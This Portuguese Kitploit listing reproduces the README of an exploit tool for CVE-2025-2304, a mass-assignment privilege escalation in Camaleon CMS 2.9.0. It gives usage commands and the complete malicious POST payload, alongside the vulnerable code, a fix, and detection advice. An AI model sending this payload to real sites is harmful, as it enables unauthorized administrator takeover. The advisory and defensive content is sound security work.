Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2304 — Este script Python explora uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS versão 2.9.0, permitindo que qualquer usuário registrado eleve seus privilégios para administrador. | Kitploit
Ferramentas/GitHubGitHub/csuribird/cve-2025-2304
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoConfiguração IncorretaAprendizado e Educação
GitHubcsuribird/cve-2025-2304

CVE-2025-2304

Este script Python explora uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS versão 2.9.0, permitindo que qualquer usuário registrado eleve seus privilégios para administrador.

51há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2025-2304 - Camaleon CMS 2.9.0 - Exploit de Escalação de Privilégios

Visão Geral

Este script Python explora uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS versão 2.9.0, permitindo que qualquer usuário registrado eleve seus privilégios para administrador.

Detalhes da Vulnerabilidade

  • CVE: CVE-2025-2304 - Mass Assignment in UsersController#updated_ajax
  • Versão Afetada: Camaleon CMS 2.9.0
  • Gravidade: Crítica
  • Vetor: O método permit! na ação updated_ajax permite que todos os parâmetros passem sem filtragem, incluindo o parâmetro role

Como o Exploit Funciona

  1. Autenticação: O script primeiro faz login como um usuário regular registrado
  2. Exploração: Envia uma requisição POST para /admin/users/[id]/updated_ajax com um payload malicioso: (No script eu usei o ID 5, pois geralmente é o atribuído automaticamente. Pode ser necessário alterar.)
    • password[role]=admin - Este parâmetro deveria ser filtrado, mas não é devido ao permit!
    • password[password] e password[password_confirmation] - Atualiza a senha do usuário (Quando um usuário regular com função de cliente atualiza seu perfil, tecnicamente é user[role]=client, mas como estamos explorando a vulnerabilidade resultante da funcionalidade de alterar senha, será password[role]=admin.)
  3. Escalação de Privilégios: A função do usuário é alterada de usuário regular para administrador
  4. Verificação: O script tenta acessar endpoints exclusivos de administrador para confirmar o sucesso

Instalação

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
python camaleon_cms_privilege_escalation.py --url http://target-cms.com --username regularuser --password userpassword

Parâmetros Opcionais

  • --new-password: Define uma nova senha durante a exploração (padrão é a senha atual)

Exemplo

root@kitploit:~
python camaleon_cms_privilege_escalation.py \
    --url http://192.168.1.100 \
    --username testuser \
    --password testpass123 \
    --new-password newadminpass

Detalhes Técnicos

Localização do Código Vulnerável

A vulnerabilidade existe no método updated_ajax do UsersController:

root@kitploit:~
def updated_ajax
  # Vulnerable code - uses permit! instead of specific parameter filtering
  @user.update(params.require(:user).permit!)
  # This allows ANY parameter to be mass-assigned, including role
end

Payload Malicioso

root@kitploit:~
POST /admin/users/[id]/updated_ajax
Content-Type: application/x-www-form-urlencoded

password[password]=newpass123&password[password_confirmation]=newpass123&password[role]=admin&_method=patch

Resposta Esperada

root@kitploit:~
{
  "success": true,
  "message": "User updated successfully"
}

Impacto

  • Escalação de Privilégios: Usuários regulares podem obter acesso de administrador
  • Comprometimento Total do Sistema: O acesso de administrador permite controle completo sobre o CMS
  • Vazamento de Dados: Acesso a todos os dados e conteúdos do usuário
  • Persistência: Capacidade de criar backdoors e manter acesso

Mitigação

Para Desenvolvedores

Substitua o método vulnerável permit! por filtragem explícita de parâmetros:

root@kitploit:~
def updated_ajax
  @user.update(params.require(:user).permit(:password, :password_confirmation, :email))
  # Explicitly exclude: role parameter
end

Para Administradores do Sistema

  1. Atualize para uma versão corrigida do Camaleon CMS (2.9.1)
  2. Implemente controles de acesso baseados em funções
  3. Adicione validação de entrada e filtragem de parâmetros
  4. Monitore tentativas suspeitas de escalação de privilégios

Aviso Legal

Este script é apenas para fins educacionais e de teste de segurança autorizado. Não use este exploit em sistemas que você não possui ou para os quais não tem permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

Detecção

Equipes de segurança podem detectar tentativas de exploração monitorando:

  • Requisições POST para /admin/users/[id]/updated_ajax com o parâmetro password[role]
  • Alterações inesperadas de função em contas de usuário
  • Padrões de escalação de privilégios em logs de auditoria

Referências

  • Documentação de Vulnerabilidade de Atribuição em Massa
  • Diretrizes de Segurança do Ruby on Rails
  • Avisos de Segurança do Camaleon CMS
Baixar ferramenta